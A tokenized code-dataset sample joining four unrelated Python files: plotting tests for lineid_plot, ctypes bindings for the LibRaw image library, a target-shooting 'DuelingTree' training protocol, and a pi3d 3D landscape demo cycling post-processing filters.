test_custom_y_loc_for_annotation_point ( ) : <EOL> wave = <NUM_LIT> + np . arange ( <NUM_LIT> ) * <NUM_LIT:0.1> <EOL> flux = np . random . normal ( size = <NUM_LIT> ) <EOL> line_wave = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> line_label1 = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> fig = plt . figure ( ) <EOL> ax = fig . add_subplot ( <NUM_LIT> ) <EOL> ax . plot ( wave , flux ) <EOL> ax . axis ( [ <NUM_LIT> , <NUM_LIT> , - <NUM_LIT:3> , <NUM_LIT:5> ] ) <EOL> lineid_plot . plot_line_ids ( wave , flux , line_wave , line_label1 , arrow_tip = <NUM_LIT> , ax = ax ) <EOL> def test_custom_y_loc_for_annotation_point_each_label_sep_loc ( ) : <EOL> wave = <NUM_LIT> + np . arange ( <NUM_LIT> ) * <NUM_LIT:0.1> <EOL> flux = np . random . normal ( size = <NUM_LIT> ) <EOL> line_wave = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> line_label1 = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> fig = plt . figure ( ) <EOL> ax = fig . add_subplot ( <NUM_LIT> ) <EOL> ax . plot ( wave , flux ) <EOL> ax . axis ( [ <NUM_LIT> , <NUM_LIT> , - <NUM_LIT:3> , <NUM_LIT:5> ] ) <EOL> arrow_tips = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> lineid_plot . plot_line_ids ( <EOL> wave , flux , line_wave , line_label1 , arrow_tip = arrow_tips , ax = ax ) <EOL> def test_custom_y_loc_for_label_boxes ( ) : <EOL> wave = <NUM_LIT> + np . arange ( <NUM_LIT> ) * <NUM_LIT:0.1> <EOL> flux = np . random . normal ( size = <NUM_LIT> ) <EOL> line_wave = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> line_label1 = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> fig = plt . figure ( ) <EOL> ax = fig . add_subplot ( <NUM_LIT> ) <EOL> ax . plot ( wave , flux ) <EOL> ax . axis ( [ <NUM_LIT> , <NUM_LIT> , - <NUM_LIT:3> , <NUM_LIT:5> ] ) <EOL> lineid_plot . plot_line_ids ( <EOL> wave , flux , line_wave , line_label1 , arrow_tip = <NUM_LIT> , ax = ax , box_loc = <NUM_LIT> ) <EOL> def test_custom_y_loc_for_label_boxes_each_box_sep_loc ( ) : <EOL> wave = <NUM_LIT> + np . arange ( <NUM_LIT> ) * <NUM_LIT:0.1> <EOL> flux = np . random . normal ( size = <NUM_LIT> ) <EOL> line_wave = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> line_label1 = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> fig = plt . figure ( ) <EOL> ax = fig . add_subplot ( <NUM_LIT> ) <EOL> ax . plot ( wave , flux ) <EOL> ax . axis ( [ <NUM_LIT> , <NUM_LIT> , - <NUM_LIT:3> , <NUM_LIT:5> ] ) <EOL> arrow_tips = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> box_loc = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> lineid_plot . plot_line_ids ( <EOL> wave , flux , line_wave , line_label1 , <EOL> arrow_tip = arrow_tips , box_loc = box_loc , ax = ax ) <EOL> def test_access_a_specific_label ( ) : <EOL> wave = <NUM_LIT> + np . arange ( <NUM_LIT> ) * <NUM_LIT:0.1> <EOL> flux = np . random . normal ( size = <NUM_LIT> ) <EOL> line_wave = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> line_label1 = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> fig = plt . figure ( ) <EOL> ax = fig . add_subplot ( <NUM_LIT> ) <EOL> ax . plot ( wave , flux ) <EOL> ax . axis ( [ <NUM_LIT> , <NUM_LIT> , - <NUM_LIT:3> , <NUM_LIT:5> ] ) <EOL> arrow_tips = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> box_loc = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> lineid_plot . plot_line_ids ( <EOL> wave , flux , line_wave , line_label1 , <EOL> arrow_tip = arrow_tips , box_loc = box_loc , ax = ax ) <EOL> a = ax . findobj ( mpl . text . Annotation ) <EOL> for i in a : <EOL> if i . get_label ( ) == "<STR_LIT>" : <EOL> i . set_visible ( False ) <EOL> a = ax . findobj ( mpl . lines . Line2D ) <EOL> for i in a : <EOL> if i . get_label ( ) == "<STR_LIT>" : <EOL> i . set_visible ( False ) <EOL> def test_max_iter_small ( ) : <EOL> wave = <NUM_LIT> + np . arange ( <NUM_LIT> ) * <NUM_LIT:0.1> <EOL> flux = np . random . normal ( size = <NUM_LIT> ) <EOL> line_wave = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> line_label1 = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> lineid_plot . plot_line_ids ( wave , flux , line_wave , line_label1 , max_iter = <NUM_LIT:10> ) <EOL> def test_max_iter_large ( ) : <EOL> wave = <NUM_LIT> + np . arange ( <NUM_LIT> ) * <NUM_LIT:0.1> <EOL> flux = np . random . normal ( size = <NUM_LIT> ) <EOL> line_wave = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> line_label1 = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> lineid_plot . plot_line_ids ( wave , flux , line_wave , line_label1 , max_iter = <NUM_LIT> ) </s>
<s> """<STR_LIT>""" <EOL> from ctypes import * <EOL> from ctypes import util <EOL> from libraw import errors <EOL> from libraw . callbacks import data_callback <EOL> from libraw . callbacks import memory_callback <EOL> from libraw . callbacks import progress_callback <EOL> from libraw . errors import c_error <EOL> from libraw import structs_16 <EOL> from libraw import structs_17 <EOL> class LibRaw ( CDLL ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> libraw = util . find_library ( '<STR_LIT>' ) <EOL> try : <EOL> if libraw is not None : <EOL> super ( LibRaw , self ) . __init__ ( libraw ) <EOL> else : <EOL> raise ImportError <EOL> except ( ImportError , AttributeError , OSError , IOError ) : <EOL> raise ImportError ( '<STR_LIT>' ) <EOL> try : <EOL> structs = { <EOL> <NUM_LIT:16> : structs_16 , <EOL> <NUM_LIT> : structs_17 , <EOL> } [ self . version_number [ <NUM_LIT:1> ] ] <EOL> except KeyError : <EOL> raise ImportError ( <EOL> '<STR_LIT>' % self . version_number <EOL> ) <EOL> libraw_data_t = structs . libraw_data_t <EOL> libraw_decoder_info_t = structs . libraw_decoder_info_t <EOL> libraw_processed_image_t = structs . libraw_processed_image_t <EOL> self . libraw_init . argtypes = [ c_int ] <EOL> self . libraw_strprogress . argtypes = [ c_int ] <EOL> self . libraw_unpack_function_name . argtypes = [ POINTER ( libraw_data_t ) ] <EOL> self . libraw_subtract_black . argtypes = [ POINTER ( libraw_data_t ) ] <EOL> self . libraw_open_file . argtypes = [ POINTER ( libraw_data_t ) , c_char_p ] <EOL> self . libraw_open_file_ex . argtypes = [ <EOL> POINTER ( libraw_data_t ) , <EOL> c_char_p , <EOL> c_int64 <EOL> ] <EOL> self . libraw_open_buffer . argtypes = [ <EOL> POINTER ( libraw_data_t ) , <EOL> c_void_p , <EOL> c_int64 <EOL> ] <EOL> self . libraw_unpack . argtypes = [ POINTER ( libraw_data_t ) ] <EOL> self . libraw_unpack_thumb . argtypes = [ POINTER ( libraw_data_t ) ] <EOL> self . libraw_recycle_datastream . argtypes = [ POINTER ( libraw_data_t ) ] <EOL> self . libraw_recycle . argtypes = [ POINTER ( libraw_data_t ) ] <EOL> self . libraw_close . argtypes = [ POINTER ( libraw_data_t ) ] <EOL> self . libraw_set_memerror_handler . argtypes = [ <EOL> POINTER ( libraw_data_t ) , <EOL> memory_callback , <EOL> c_void_p , <EOL> ] <EOL> self . libraw_set_dataerror_handler . argtypes = [ <EOL> POINTER ( libraw_data_t ) , <EOL> data_callback , <EOL> c_void_p , <EOL> ] <EOL> self . libraw_set_progress_handler . argtypes = [ <EOL> POINTER ( libraw_data_t ) , <EOL> progress_callback , <EOL> c_void_p , <EOL> ] <EOL> self . libraw_adjust_sizes_info_only . argtypes = [ <EOL> POINTER ( libraw_data_t ) <EOL> ] <EOL> self . libraw_dcraw_ppm_tiff_writer . argtypes = [ <EOL> POINTER ( libraw_data_t ) , <EOL> c_char_p <EOL> ] <EOL> self . libraw_dcraw_thumb_writer . argtypes = [ <EOL> POINTER ( libraw_data_t ) , <EOL> c_char_p <EOL> ] <EOL> self . libraw_dcraw_process . argtypes = [ POINTER ( libraw_data_t ) ] <EOL> self . libraw_dcraw_make_mem_image . argtypes = [ <EOL> POINTER ( libraw_data_t ) , <EOL> POINTER ( c_int ) <EOL> ] <EOL> self . libraw_dcraw_make_mem_thumb . argtypes = [ <EOL> POINTER ( libraw_data_t ) , <EOL> POINTER ( c_int ) <EOL> ] <EOL> self . libraw_dcraw_clear_mem . argtypes = [ <EOL> POINTER ( libraw_processed_image_t ) <EOL> ] <EOL> self . libraw_raw2image . argtypes = [ POINTER ( libraw_data_t ) ] <EOL> self . libraw_free_image . argtypes = [ POINTER ( libraw_data_t ) ] <EOL> self . libraw_get_decoder_info . argtypes = [ <EOL> POINTER ( libraw_data_t ) , <EOL> POINTER ( libraw_decoder_info_t ) <EOL> ] <EOL> self . libraw_COLOR . argtypes = [ <EOL> POINTER ( libraw_data_t ) , <EOL> c_int , <EOL> c_int <EOL> ] <EOL> self . libraw_init . restype = POINTER ( libraw_data_t ) <EOL> self . libraw_version . restype = c_char_p <EOL> self . libraw_strprogress . restype = c_char_p <EOL> self . libraw_versionNumber . restype = c_int <EOL> self . libraw_cameraCount . restype = c_int <EOL> self . libraw_cameraList . restype = POINTER ( <EOL> c_char_p * self . libraw_cameraCount ( ) <EOL> ) <EOL> self . libraw_unpack_function_name . restype = c_char_p <EOL> self . libraw_subtract_black . restype = POINTER ( libraw_data_t ) <EOL> self . libraw_open_file . restype = c_error <EOL> self . libraw_open_file_ex . restype = c_error <EOL> self . libraw_open_buffer . restype = c_error <EOL> self . libraw_unpack . restype = c_error <EOL> self . libraw_unpack_thumb . restype = c_error <EOL> self . libraw_adjust_sizes_info_only . restype = c_error <EOL> self . libraw_dcraw_ppm_tiff_writer . restype = c_error <EOL> self . libraw_dcraw_thumb_writer . restype = c_error <EOL> self . libraw_dcraw_process . restype = c_error <EOL> self . libraw_dcraw_make_mem_image . restype = POINTER ( <EOL> libraw_processed_image_t ) <EOL> self . libraw_dcraw_make_mem_thumb . restype = POINTER ( <EOL> libraw_processed_image_t ) <EOL> self . libraw_raw2image . restype = c_error <EOL> self . libraw_get_decoder_info . restype = c_error <EOL> self . libraw_COLOR . restype = c_int <EOL> try : <EOL> self . libraw_open_wfile . argtypes = [ <EOL> POINTER ( libraw_data_t ) , <EOL> c_wchar_p <EOL> ] <EOL> self . libraw_open_wfile_ex . argtypes = [ <EOL> POINTER ( libraw_data_t ) , <EOL> c_wchar_p , <EOL> c_int64 <EOL> ] <EOL> self . libraw_open_wfile . restype = c_error <EOL> self . libraw_open_wfile_ex . restype = c_error <EOL> except AttributeError : <EOL> pass <EOL> @ property <EOL> def version_number ( self ) : <EOL> """<STR_LIT>""" <EOL> v = self . libraw_versionNumber ( ) <EOL> return ( ( v >> <NUM_LIT:16> ) & <NUM_LIT> , ( v >> <NUM_LIT:8> ) & <NUM_LIT> , v & <NUM_LIT> ) <EOL> @ property <EOL> def version ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . libraw_version ( ) . decode ( '<STR_LIT:utf-8>' ) <EOL> def __getitem__ ( self , name ) : <EOL> func = super ( LibRaw , self ) . __getitem__ ( name ) <EOL> func . errcheck = errors . check_call <EOL> return func </s>
<s> import threading <EOL> from training_protocols . ITrainingProtocol import ITrainingProtocol <EOL> class DuelingTree ( ITrainingProtocol ) : <EOL> def __init__ ( self , main_window , protocol_operations , targets ) : <EOL> self . _operations = protocol_operations <EOL> self . _operations . reset ( ) <EOL> self . _continue_protocol = True <EOL> self . _protocol_is_resetting = False <EOL> self . _left_score = <NUM_LIT:0> <EOL> self . _right_score = <NUM_LIT:0> <EOL> self . _targets_on_left = [ ] <EOL> self . _targets_on_right = [ ] <EOL> self . _wait_event = threading . Event ( ) <EOL> if self . _find_targets ( targets ) : <EOL> self . _operations . add_shot_list_columns ( ( "<STR_LIT>" , ) , [ <NUM_LIT> ] ) <EOL> def _find_targets ( self , targets ) : <EOL> found_target = False <EOL> for target in targets : <EOL> if found_target : <EOL> break <EOL> for region in target [ "<STR_LIT>" ] : <EOL> if "<STR_LIT>" in region : <EOL> if region [ "<STR_LIT>" ] . startswith ( "<STR_LIT>" ) : <EOL> self . _targets_on_left . append ( region [ "<STR_LIT>" ] ) <EOL> found_target = True <EOL> elif region [ "<STR_LIT>" ] . startswith ( "<STR_LIT>" ) : <EOL> self . _targets_on_right . append ( region [ "<STR_LIT>" ] ) <EOL> found_target = True <EOL> if not found_target : <EOL> self . _operations . say ( "<STR_LIT>" ) <EOL> else : <EOL> self . _operations . show_text_on_feed ( "<STR_LIT>" ) <EOL> return found_target <EOL> def shot_listener ( self , shot , shot_list_item , is_hit ) : <EOL> return <EOL> def hit_listener ( self , region , tags , shot , shot_list_item ) : <EOL> if "<STR_LIT>" in tags : <EOL> if ( tags [ "<STR_LIT>" ] . startswith ( "<STR_LIT>" ) or tags [ "<STR_LIT>" ] . startswith ( "<STR_LIT>" ) ) : <EOL> if tags [ "<STR_LIT>" ] in self . _targets_on_left : <EOL> self . _targets_on_left . remove ( tags [ "<STR_LIT>" ] ) <EOL> self . _targets_on_right . append ( tags [ "<STR_LIT>" ] ) <EOL> hit_by = "<STR_LIT:left>" <EOL> elif tags [ "<STR_LIT>" ] in self . _targets_on_right : <EOL> self . _targets_on_left . append ( tags [ "<STR_LIT>" ] ) <EOL> self . _targets_on_right . remove ( tags [ "<STR_LIT>" ] ) <EOL> hit_by = "<STR_LIT:right>" <EOL> self . _operations . append_shot_item_values ( shot_list_item , <EOL> ( hit_by , ) ) <EOL> if ( len ( self . _targets_on_right ) == <NUM_LIT:6> ) : <EOL> self . _left_score += <NUM_LIT:1> <EOL> self . _round_over ( ) <EOL> if ( len ( self . _targets_on_left ) == <NUM_LIT:6> ) : <EOL> self . _right_score += <NUM_LIT:1> <EOL> self . _round_over ( ) <EOL> def _round_over ( self ) : <EOL> message = "<STR_LIT>" % ( self . _left_score , <EOL> self . _right_score ) <EOL> self . _operations . show_text_on_feed ( message ) <EOL> if self . _continue_protocol : <EOL> self . _operations . pause_shot_detection ( True ) <EOL> self . _new_round_thread = Thread ( target = self . _new_round , <EOL> name = "<STR_LIT>" ) <EOL> self . _new_round_thread . start ( ) <EOL> def _new_round ( self ) : <EOL> self . _wait_event . wait ( <NUM_LIT:5> ) <EOL> self . _protocol_is_resetting = True <EOL> self . _operations . reset ( ) <EOL> self . _protocol_is_resetting = False <EOL> self . _operations . pause_shot_detection ( False ) <EOL> message = "<STR_LIT>" % ( self . _left_score , <EOL> self . _right_score ) <EOL> self . _operations . show_text_on_feed ( message ) <EOL> def reset ( self , targets ) : <EOL> if not self . _protocol_is_resetting : <EOL> self . _left_score = <NUM_LIT:0> <EOL> self . _right_score = <NUM_LIT:0> <EOL> self . _operations . show_text_on_feed ( "<STR_LIT>" ) <EOL> self . _protocol_is_resetting = False <EOL> self . _targets_on_left = [ ] <EOL> self . _targets_on_right = [ ] <EOL> self . _find_targets ( targets ) <EOL> def destroy ( self ) : <EOL> self . _continue_protocol = False <EOL> self . _wait_event . set ( ) <EOL> pass <EOL> def get_info ( ) : <EOL> protocol_info = { } <EOL> protocol_info [ "<STR_LIT:name>" ] = "<STR_LIT>" <EOL> protocol_info [ "<STR_LIT:version>" ] = "<STR_LIT:1.0>" <EOL> protocol_info [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> desc = "<STR_LIT>" <EOL> desc += "<STR_LIT>" <EOL> desc += "<STR_LIT>" <EOL> desc += "<STR_LIT>" <EOL> protocol_info [ "<STR_LIT:description>" ] = desc <EOL> return protocol_info <EOL> def load ( main_window , protocol_operations , targets ) : <EOL> return DuelingTree ( main_window , protocol_operations , targets ) </s>
<s> from __future__ import absolute_import , division , print_function , unicode_literals <EOL> """<STR_LIT>""" <EOL> import math , random , time <EOL> import demo <EOL> import pi3d <EOL> LOGGER = pi3d . Log . logger ( __name__ ) <EOL> LOGGER . info ( "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" ) <EOL> DISPLAY = pi3d . Display . create ( w = <NUM_LIT> , h = <NUM_LIT> ) <EOL> DISPLAY . set_background ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> pi3d . Light ( lightpos = ( <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:3> ) , lightcol = ( <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT> ) , lightamb = ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> shader = pi3d . Shader ( "<STR_LIT>" ) <EOL> flatsh = pi3d . Shader ( "<STR_LIT>" ) <EOL> tree2img = pi3d . Texture ( "<STR_LIT>" ) <EOL> tree1img = pi3d . Texture ( "<STR_LIT>" ) <EOL> hb2img = pi3d . Texture ( "<STR_LIT>" ) <EOL> bumpimg = pi3d . Texture ( "<STR_LIT>" ) <EOL> reflimg = pi3d . Texture ( "<STR_LIT>" ) <EOL> rockimg = pi3d . Texture ( "<STR_LIT>" ) <EOL> FOG = ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <NUM_LIT> ) <EOL> TFOG = ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1.0> ) , <NUM_LIT> ) <EOL> ectex = pi3d . loadECfiles ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> myecube = pi3d . EnvironmentCube ( size = <NUM_LIT> , maptype = "<STR_LIT>" , name = "<STR_LIT>" ) <EOL> myecube . set_draw_details ( flatsh , ectex ) <EOL> mapwidth = <NUM_LIT> <EOL> mapdepth = <NUM_LIT> <EOL> mapheight = <NUM_LIT> <EOL> mountimg1 = pi3d . Texture ( "<STR_LIT>" ) <EOL> mymap = pi3d . ElevationMap ( "<STR_LIT>" , name = "<STR_LIT>" , <EOL> width = mapwidth , depth = mapdepth , height = mapheight , <EOL> divx = <NUM_LIT:32> , divy = <NUM_LIT:32> ) <EOL> mymap . set_draw_details ( shader , [ mountimg1 , bumpimg , reflimg ] , <NUM_LIT> , <NUM_LIT:0.0> ) <EOL> mymap . set_fog ( * FOG ) <EOL> treeplane = pi3d . Plane ( w = <NUM_LIT> , h = <NUM_LIT> ) <EOL> treemodel1 = pi3d . MergeShape ( name = "<STR_LIT>" ) <EOL> treemodel1 . add ( treeplane . buf [ <NUM_LIT:0> ] , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> treemodel1 . add ( treeplane . buf [ <NUM_LIT:0> ] , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> treemodel2 = pi3d . MergeShape ( name = "<STR_LIT>" ) <EOL> treemodel2 . add ( treeplane . buf [ <NUM_LIT:0> ] , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> treemodel2 . add ( treeplane . buf [ <NUM_LIT:0> ] , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> treemodel2 . add ( treeplane . buf [ <NUM_LIT:0> ] , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> mytrees1 = pi3d . MergeShape ( name = "<STR_LIT>" ) <EOL> mytrees1 . cluster ( treemodel1 . buf [ <NUM_LIT:0> ] , mymap , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:20> , "<STR_LIT>" , <NUM_LIT> , <NUM_LIT> ) <EOL> mytrees1 . set_draw_details ( flatsh , [ tree2img ] , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) <EOL> mytrees1 . set_fog ( * TFOG ) <EOL> mytrees2 = pi3d . MergeShape ( name = "<STR_LIT>" ) <EOL> mytrees2 . cluster ( treemodel2 . buf [ <NUM_LIT:0> ] , mymap , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:20> , "<STR_LIT>" , <NUM_LIT> , <NUM_LIT> ) <EOL> mytrees2 . set_draw_details ( flatsh , [ tree1img ] , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) <EOL> mytrees2 . set_fog ( * TFOG ) <EOL> mytrees3 = pi3d . MergeShape ( name = "<STR_LIT>" ) <EOL> mytrees3 . cluster ( treemodel2 , mymap , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:20> , "<STR_LIT>" , <NUM_LIT> , <NUM_LIT> ) <EOL> mytrees3 . set_draw_details ( flatsh , [ hb2img ] , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) <EOL> mytrees3 . set_fog ( * TFOG ) <EOL> monument = pi3d . Model ( file_string = "<STR_LIT>" , name = "<STR_LIT>" ) <EOL> monument . set_shader ( shader ) <EOL> monument . set_normal_shine ( bumpimg , <NUM_LIT> , reflimg , <NUM_LIT:0.5> ) <EOL> monument . set_fog ( * FOG ) <EOL> monument . translate ( <NUM_LIT> , - mymap . calcHeight ( <NUM_LIT> , <NUM_LIT> ) + <NUM_LIT> , <NUM_LIT> ) <EOL> monument . scale ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> monument . rotateToY ( <NUM_LIT> ) <EOL> scshots = <NUM_LIT:1> <EOL> rot = <NUM_LIT:0.0> <EOL> tilt = <NUM_LIT:0.0> <EOL> avhgt = <NUM_LIT> <EOL> xm = <NUM_LIT:0.0> <EOL> zm = <NUM_LIT:0.0> <EOL> ym = mymap . calcHeight ( xm , zm ) + avhgt <EOL> mykeys = pi3d . Keyboard ( ) <EOL> CAMERA = pi3d . Camera ( scale = <NUM_LIT:0.5> ) <EOL> CAM2D = pi3d . Camera ( is_3d = False ) <EOL> font = pi3d . Font ( "<STR_LIT>" , ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:255> ) ) <EOL> filter_list = [ [ "<STR_LIT>" , [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ] ] , <EOL> [ "<STR_LIT>" , [ <NUM_LIT> ] ] , <EOL> [ "<STR_LIT>" , [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ] ] , <EOL> [ "<STR_LIT>" , [ - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ "<STR_LIT>" , [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.1> ] ] , <EOL> [ "<STR_LIT>" , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.1> ] ] , <EOL> [ "<STR_LIT>" , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT> ] ] , <EOL> [ "<STR_LIT>" , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT> ] ] , <EOL> [ "<STR_LIT>" , [ <NUM_LIT:1.0> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ "<STR_LIT>" , [ <NUM_LIT> ] , [ <NUM_LIT> ] ] , <EOL> [ "<STR_LIT>" , [ <NUM_LIT> ] , [ <NUM_LIT> ] ] , <EOL> [ "<STR_LIT>" , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT> , - <NUM_LIT> ] ] , <EOL> [ "<STR_LIT>" , [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ] ] , <EOL> [ "<STR_LIT>" , [ <NUM_LIT:1.0> , <NUM_LIT:0.5> , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:0.5> , <NUM_LIT:0.5> , <NUM_LIT:0.0> , <NUM_LIT:1.0> ] ] , <EOL> [ "<STR_LIT>" , [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ] ] , <EOL> [ "<STR_LIT>" , [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT> ] ] , <EOL> [ "<STR_LIT>" , [ <NUM_LIT> ] ] , <EOL> [ "<STR_LIT>" , [ <NUM_LIT:0.1> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ] ] ] <EOL> n_filter = len ( filter_list ) <EOL> i_filter = - <NUM_LIT:1> <EOL> cx , cz = <NUM_LIT> , <NUM_LIT> <EOL> c_rad = <NUM_LIT> <EOL> frame = <NUM_LIT:0> <EOL> st_time = time . time ( ) <EOL> while DISPLAY . loop_running ( ) : <EOL> if rot % <NUM_LIT> == <NUM_LIT:0.0> : <EOL> LOGGER . info ( "<STR_LIT>" . format ( filter_list [ i_filter % n_filter ] [ <NUM_LIT:0> ] , <EOL> <NUM_LIT> / ( time . time ( ) - st_time ) ) ) <EOL> i_filter = ( i_filter + <NUM_LIT:1> ) % n_filter <EOL> texetc = [ reflimg ] if ( i_filter < <NUM_LIT:3> ) else None <EOL> post = pi3d . PostProcess ( filter_list [ i_filter ] [ <NUM_LIT:0> ] , add_tex = texetc , scale = <NUM_LIT:0.5> ) <EOL> post . sprite . set_custom_data ( <NUM_LIT> , filter_list [ i_filter ] [ <NUM_LIT:1> ] ) <EOL> string = pi3d . String ( font = font , string = filter_list [ i_filter ] [ <NUM_LIT:0> ] , <EOL> camera = CAM2D , is_3d = False , x = <NUM_LIT:0> , y = - <NUM_LIT> , z = <NUM_LIT:0.5> ) <EOL> string . set_shader ( flatsh ) <EOL> st_time = time . time ( ) <EOL> if len ( filter_list [ i_filter ] ) > <NUM_LIT:2> : <EOL> for i , delta in enumerate ( filter_list [ i_filter ] [ <NUM_LIT:2> ] ) : <EOL> post . sprite . set_custom_data ( <NUM_LIT> + i , [ filter_list [ i_filter ] [ <NUM_LIT:1> ] [ i ] + rot * delta ] ) <EOL> xm = cx + math . sin ( math . radians ( rot ) ) * c_rad <EOL> zm = cz - math . cos ( math . radians ( rot ) ) * c_rad <EOL> ym = mymap . calcHeight ( xm , zm ) + avhgt <EOL> rot += <NUM_LIT:1.0> <EOL> CAMERA . reset ( ) <EOL> CAMERA . rotate ( tilt , rot + <NUM_LIT> , <NUM_LIT:0> ) <EOL> CAMERA . position ( ( xm , ym , zm ) ) <EOL> post . start_capture ( ) <EOL> monument . draw ( ) <EOL> mytrees1 . draw ( ) <EOL> mytrees2 . draw ( ) <EOL> mytrees3 . draw ( ) <EOL> mymap . draw ( ) <EOL> myecube . draw ( ) <EOL> post . end_capture ( ) <EOL> post . draw ( ) <EOL> string . draw ( ) <EOL> frame += <NUM_LIT:1> <EOL> k = mykeys . read ( ) <EOL> if k > - <NUM_LIT:1> : <EOL> if k == <NUM_LIT> : <EOL> pi3d . screenshot ( "<STR_LIT>" + str ( scshots ) + "<STR_LIT>" ) <EOL> scshots += <NUM_LIT:1> <EOL> elif k == <NUM_LIT:10> : <EOL> mc = <NUM_LIT:0> <EOL> elif k == <NUM_LIT> : <EOL> mykeys . close ( ) <EOL> DISPLAY . stop ( ) <EOL> break <EOL> CAMERA . was_moved = False </s>
